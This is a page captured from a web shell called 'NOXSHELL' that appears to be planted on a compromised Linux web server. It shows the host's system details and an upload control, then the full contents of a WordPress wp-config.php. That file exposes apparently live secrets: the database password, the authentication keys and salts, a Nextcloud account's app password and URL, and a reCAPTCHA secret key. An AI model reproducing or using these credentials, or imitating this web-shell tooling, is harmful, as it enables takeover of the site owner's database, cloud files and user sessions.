NOXSHELL
Server: Apache
System: Linux dd31416 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User: w018fe51 (1646)
PHP: 8.3.29-nmm1
Disabled: NONE
Upload Files
File: /www/htdocs/w018fe51/ipa/wp-config.php
<?php
define('WP_CACHE', true); // WP-Optimize Cache
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'd027c69f');
/** MySQL database username */
define('DB_USER', 'd027c69f');
/** MySQL database password */
define('DB_PASSWORD', 'qeR53Gz4QRk2GfTN');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
@ini_set( 'max_input_vars' , 5000 );
define('AUTH_KEY',         'AeWL{UxWV)yhEf5B5*>oRP>&}ob6!2MBt(lr[gK5mFz5/2UA9q2jDNoC?RW@b(`X');
define('SECURE_AUTH_KEY',  '-NMg7vy&?u9K)lk@`{,%KxGiM|+2&ii298vN1qRMhjwoWe1:b;>/6cvab!pfjZu$');
define('LOGGED_IN_KEY',    'qmP#a%NKmH<F/K_odz{x_tZCuM+a+!dyn6zP:Ky)r8M#b.pG*nAgdz,ZJ5=R5!N%');
define('NONCE_KEY',        'KTNtOTif$jI0[o7K3|1/*jV<*,O*WR?$)lwVCb>EMfR,VhThfdtnOM,VWX_2-|44');
define('AUTH_SALT',        'j.h/n)R>l(GEmy/U`%E2QOg++G:5FLG2X1?H7pd$u-Ge)T<fW`u+2^3:(KMKvr[P');
define('SECURE_AUTH_SALT', '$yv:k[=bfbHm9cUnELvT-,l3T;]L0;z26sJ#Ped9I/(`oZO7*Gi5PWF(q%R!>N3R');
define('LOGGED_IN_SALT',   'DZTrA:.hF4I8mwLu@8-omQt`THaquqF<Nx0m5<WYN#o=x>5;S?,Co!%EId9@W]Y(');
define('NONCE_SALT',       'Whsj&LERM7nHS$a*BjJ3jMV64mSiK0o%vdm{35O_J@){Cg&cSOt@{MS1<)xf7ii0');
/**#@-*/
/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wifrj_';
define( 'WP_POST_REVISIONS', 10 );
// Nextcloud Service-Zugang
define('BMI_NC_USER',        'Juergen');       // z. B. "jfritz"
define('BMI_NC_APP_PASSWORD','RWx9H-Dratw-ppcsf-mjH9J-WWj3d');     // das eben erzeugte App-Passwort
define('BMI_NC_BASEURL',     'https://ipa-cloud.de');       // deine Nextcloud-URL
define('BMI_NC_BASEDIR', '/2025/documenta archiv Kassel/Museumsnacht 2025 – Uploads');         // Stammordner für Uploads
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', true);
define( 'WP_DEBUG_DISPLAY', false );
define( 'WP_DEBUG_LOG', true );
define( 'MEDIA_TRASH', true );
set_time_limit(180);
// === reCAPTCHA v3 Keys for i-pa.org ===
define('BMI_RECAPTCHA_SITEKEY', '6LeAALMUAAAAAGc3SVi1vDrKPYyhFiYPHC-omlbF');
define('BMI_RECAPTCHA_SECRET',  '6LeAALMUAAAAAEbxiwKxATWGi49Vde9dnCElecvg');
define('BMI_RECAPTCHA_VERSION', 'v3');
define('BMI_RECAPTCHA_SCORE',   0.5);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');//Disable File Edits
define('DISALLOW_FILE_EDIT', false);